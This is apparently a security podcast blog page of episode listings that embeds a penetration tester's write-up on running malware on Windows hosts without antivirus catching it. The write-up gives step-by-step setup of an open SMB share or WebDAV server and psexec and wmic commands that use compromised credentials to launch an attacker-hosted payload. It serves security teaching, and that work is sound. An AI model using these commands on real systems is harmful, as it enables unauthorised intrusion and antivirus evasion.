An RF Detector (sorta):

Episode 288 Show Notes

Episode 288 Part 2 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Aaron Crawford joins us to show us how we can create our own products and trick people into, well, pwnage.:

Episode 288 Show Notes

Episode 288 Part 1 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Daniel Martin joined us to talk about collecting penetration results and reporting with the Dradis Framework:

Episode 288 Show Notes

Episode 288 Part 2 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Cedric comes on to talk about Wifi Security, Skydiving, Hacking, and more!:

Episode 288 Show Notes

Episode 288 Part 1 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Daniel Martin joined us to talk about collecting penetration results and reporting with the Dradis Framework:

Episode 287 Show Notes

Episode 287 Part 2 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Dr. Anton Chuvakin joined us for an interview about logs, SIEM and PCI:

Episode 287 Show Notes

Episode 287 Part 1 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

On a recent penetration test, I ran into an interesting problem whose solution resulted in several handy techniques for remote malware distribution and, in some cases, antivirus bypass. These techniques may be common amongst seasoned penetration testers, but I felt they were worth sharing with the rest of the information security community, seeing as it doesn't disclose any "patchable" vulnerabilities

I had gained user access to the target environment and conducted a password guessing attack against the domain which netted a privileged set of credentials with access equivalent to Local Administrator on every client. This account gave me the ability to execute commands on remote operating systems. The traditional next step is either to copy token impersonation malware to a system with Domain Administrator tokens present and impersonate the domain administrator token, or migrate into one of the domain administrator's processes, achieving the maximum level of privilege on the domain.

In this particular case, any malware that I attempted to upload and execute on a remote system was promptly removed by antivirus software. In most cases I would package the malware using one of my custom antivirus bypassing techniques (not disclosed here), upload and execute it, bypassing the antivirus software. However, I didn't have my antivirus bypass kit readily available, so I thought maybe if I placed the malware in a read-only share on a system I controlled, psexec'd a cmd.exe shell to the remote host, and launched the malware directly from my share via SMB, I may just get it past antivirus. I wasn't optimistic. To my complete surprise, the malware fired without interference from antivirus.

As it turns out, antivirus clients do not scan network shares by default due to the amount of bandwidth that would be consumed if all hosts were scanning their mapped network drives simultaneously. There is usually, however, a setting to scan shared files on access, but this settings is also disabled by default. In this case, both remained disabled and I was able to execute malware remotely without putting the malware through encoding gymnastics to bypass antivirus.

While this is a pretty neat technique to keep in mind for future engagements, I wanted to take this a step further. I was chatting with Mark Baggett about the previos technique and he mentioned to me how he executes Sysinternal's tools directly from their live website via WebDAV. That was all I needed to hear. Immediately, I began looking for an easy way to host files via WebDAV. While setting up WebDAV in Windows appears simple, getting all the permissions to work correctly in modern versions of IIS can be painful. So I turned to Metasploit and some of the existing modules, such as the DLL injection exploit which hosts executables and malicious DLLs via WebDAV. The code wasn't designed to do what I was asking it to do and needed to be modified. I'm a Python guy, so I'll admit, I was lost in the Ruby. I turned to a good friend and Ruby guru, Chris Gates (@carnal0wnage). In a few short moments, he whipped up a WebDAV web server auxiliary module which he will be releasing on his blog very soon. The objective here was to execute malware hosted on a web server over port 80 without ever moving the malware to the target system. This, because egress traffic over port 445 is usually restricted or at least easily detected. As expected, I was able to access the malware on the target system, WIN!... only in this case, antivirus promptly killed it. FAIL! During testing, Chris noticed that the malware was getting caught in prefetch. Unfortunately, there's no way around this. That's just the way the WebClient service works. Bummer.

So we have 2 things here:
1. Hosting malware in a shared folder and executing it remotely via SMB will, based on client configuration, bypass antivirus and launch the malware.
2. Hosting malware on a WebDAV server and executing it remotely will access the malware, but gets caught by antivirus, requiring additional steps to avoid detection.

Depending on your goal, level of access, and ability to manipulate malware to avoid antivirus, one of these techniques may be useful to you. Below I've outlined how I set up each of these techniques.

Remote Malware Deployment via SMB:
1. Share a folder on a windows system you control.
2. In order to avoid having to pass credentials, give 'Everyone' share and NTFS permissions to 'read and execute' contents of the shared folder.
3. In order for unauthenticated users to qualify as 'Everyone', enable the built-in 'Guest' account which is disabled by default in modern versions of Windows.
4. Remove the 'Guest' account from the 'Deny access to this computer from the network' setting in the Local Security Policy. You should now have unauthenticated access to the share.
FREE CHICKEN!: Want an effective way to prevent your universal Administrator account from coming back to haunt you, while allowing it to still be useful? Add it here. You can do this for every system in the domain via GPO. That way, the account can be used locally, but the hashes can't be used against you remotely. Thanks for the tip Tim!

5. Use psexec or wmic (courtesy Tim Medin) to execute the malware on the remote host, in one command, without mapping a network share.

psexec \\10.106.14.20 /u domain\compromised_user /p password "\\10.220.52.76\test\msf.exe"
or
wmic /node:10.106.14.20 /user:domain\compromised_user /password:password process call create "\\10.220.52.76\test\msf.exe"

Remote Malware Deployment via WebDAV:
1. Put obfuscated malware in a folder.
2. launch Metasploit and load CG's webdav_file_server module.
3. Set the module options and run the module.

4. Use psexec or wmic (once again, courtesy Tim Medin) to execute the malware on the remote host, in one command, without mapping a network share. The same command as above, changing only the attacker controlled path, should work.

psexec \\10.106.14.20 /u domain\compromised_user /p password "\\10.220.52.76\documents\msf.exe"
or
wmic /node:10.106.14.20 /user:domain\compromised_user /password:password process call create "\\10.220.52.76\documents\msf.exe"

#WIN!

In this episode we discuss the origin of legacy vulnerabilities. We also discuss the Amnesty International hack and how it takes a special jackass to hack a charity.

Links for this episode:

Offensive Countermeasures at BlackHat

Links to cool stuff our awesome sponsors are providing:

CloudPassage offers a free Basic version of Halo that includes extensive cloud security features, such as host-based firewalls, vulnerability management, security event alerting, server account management and intrusion detection. Halo works with any cloud provider and makes server security portable across environments. The convenient Halo portal allows you to manage all your security from one screen, whether it's in public, private or hybrid clouds – even traditional data centers.

Check it out here

Manage your Big Data with the most scalable log & security intelligence platform for the Enterprise & Cloud.Don’t take our word. Try it for yourself! For a limited time, download here

Video Feeds:

Don't miss Episode 288 of PaulDotCom Security Weekly which will feature Cedric Blancher, senior researcher at EADS Innovation Works Computer Security Research Lab and a Guest Technical Segment from Aaron Crawford on Social Engineering. Come participate in our IRC channel or sit back and enjoy it live via our Ustream channel:

Episode 287 of PaulDotCom Security Weekly will feature an interview with Dr. Anton Chuvakin to talk log management, SIEM and PCI DSS compliance and a Guest Technical Segment from Dradis Framework creator Daniel Martin. Come participate in our IRC channel or sit back and enjoy it live via our Ustream channel:

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or if you prefer, visit the Episode 287 show notes page.

Don't forget to follow us on Twitter: Paul Asadoorian, Larry Pesce, Jack Daniel, Carlos Perez, John Strand and Mike Perez.